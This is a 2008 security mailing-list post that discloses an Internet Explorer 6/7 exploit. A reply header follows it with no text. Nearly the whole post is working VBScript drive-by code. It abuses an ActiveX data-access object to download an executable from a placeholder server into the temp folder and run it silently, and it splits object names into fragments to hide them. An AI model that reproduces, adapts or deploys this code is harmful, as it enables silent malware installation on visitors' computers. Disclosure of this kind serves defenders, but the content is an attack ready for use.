Exploit in IE6,7 Jan 28 2008 11:37AM
r2t hotmail it (1 replies)
Discovred By : Hasadya Raed

E-mail : r2t (at) hotmail (dot) it [email concealed] , Hacker_Web (at) w (dot) cn [email concealed]

-----------------------------------------

Exploit : Internet Explorer 6,7

-----------------------------------------

Code :

<HTML>

<HEAD>

<**** http-eqiv="content-type" content="text/html;charset=gb2312">

<title>test</title>

<textarea style="display:none" id=lshdic200Xpage rows="1" cols="20"></textarea><script language=vbs>document.write(strreverse(lshdic200Xpage.value))</script>

<script

language="VBScript">

on error resume next

xx="object"

xxx="classid"

xxxx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

xxxxx="Microsoft.XMLHTTP"

xxxxxx="GET"

xxxxxxx="Scripting.FileSystemObject"

xxxxxxxx="Shell.Application"

dl = "http://Path-Server"

Set df = document.createElement(xx)

df.setAttribute xxx, xxxx

str=xxxxx

Set a = df.CreateObject(str,"")

a1="Ado"

a2="db."

a3="Str"

a4="eam"

str1=a1&a2&a3&a4

str5=str1

set S = df.createobject(str5,"")

S.type = 1

str6=xxxxxx

a.Open str6, dl, 0

a.Send

fname1="s.exe"

set F = df.createobject(xxxxxxx,"")

set tmp = F.GetSpecialFolder(2)

fname1= F.BuildPath(tmp,fname1)

S.open

S.write a.responseBody

S.savetofile fname1,2

S.close

set Q = df.createobject(xxxxxxxx,"")

str1=a1&a2&a3&a4

Q.ShellExecute fname1,"","","open",0

</script>

<script type="text/jscript">

function init() {

document.write(Date());

}

window.onload = init;

</script>

</HEAD>

<BODY>

</BODY>

</HTML>

-----------------------------------------------

[ reply ]
Re: Exploit in IE6,7 Jan 28 2008 10:25PM
Nick FitzGerald (nick virus-l demon co uk)


 

Privacy Statement
Copyright 2010, SecurityFocus